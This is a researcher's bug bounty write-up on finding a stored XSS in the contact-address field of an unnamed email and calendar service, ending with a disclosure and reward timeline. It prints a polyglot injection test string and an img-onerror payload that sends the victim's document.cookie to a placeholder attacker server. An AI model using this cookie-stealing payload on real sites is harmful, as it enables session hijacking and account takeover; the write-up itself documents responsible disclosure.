How I find my first Stored XSS

Hi everyone! 🎉

My name is Filipe Azevedo, known as filipaze on the internet. This is my first write-up. 😃

During the COVID-19 pandemic with nothing to do between classes, I ventured into the world of cybersecurity and started doing bug bounties in October last year.

I started the recon on a target that for obvious reasons I can’t disclose. It was a service similar to Google, has an email service, calendar, etc.

The part that caught my attention the most was the agenda service, which allowed you to save contacts and share them with someone.

Like every time I start hacking a target I use the app as a normal user and in the process I fill every input with <img src=x onerror=alert()>’”${{2*2}}

With this payload, I test for HTML injection, XSS, and code injection. All of this, with one payload 😇

The site made it possible to associate an address with a contact. In the final contact, a map for the address was added along with the other contact details, and that was where the bug was. I notice that if I put the payload <imf src=x onerror=alert()> on the address input, the XSS was triggered. So, I have a Stored XSS in my hands.

But happiness was short-lived. I realized that if the payload escaped a little from what I put in initially, it would stop working. For example, is I change this:

<img src=x onerror=alert()>

to this:

<img src=x onerror=alert(“hacked”)>

the payload stopped working.

But suddenly I thought if this address is going to be used to serve a map to the user, maybe if he finds a location for my address, the payload will work. So I tried! And guess what! IT WORKED!!!!!

So now, I was able to deliver any payload to the victim just by adding a city before the payload. Before reporting this to the company I tried successfully steal my account’s cookies. This was the payload I used to do that:

new york <img src=x onerror=this.src=’<PUT_HERE_YOUR_SERVER>?’+document.cookie> (I used ngrok)

Yes, this payload generates an unlimited number of requests to your server, but I was limited to 100 characters, so I needed to keep it the smallest possible.

I reported to the company and got rewarded 2 weeks and a half later.

26–04–2021: Reported to the company

27–04–2021: Triaged by Intigriti

03–05–2021: Validated by the company

12–05–2021: Rewarded €€€!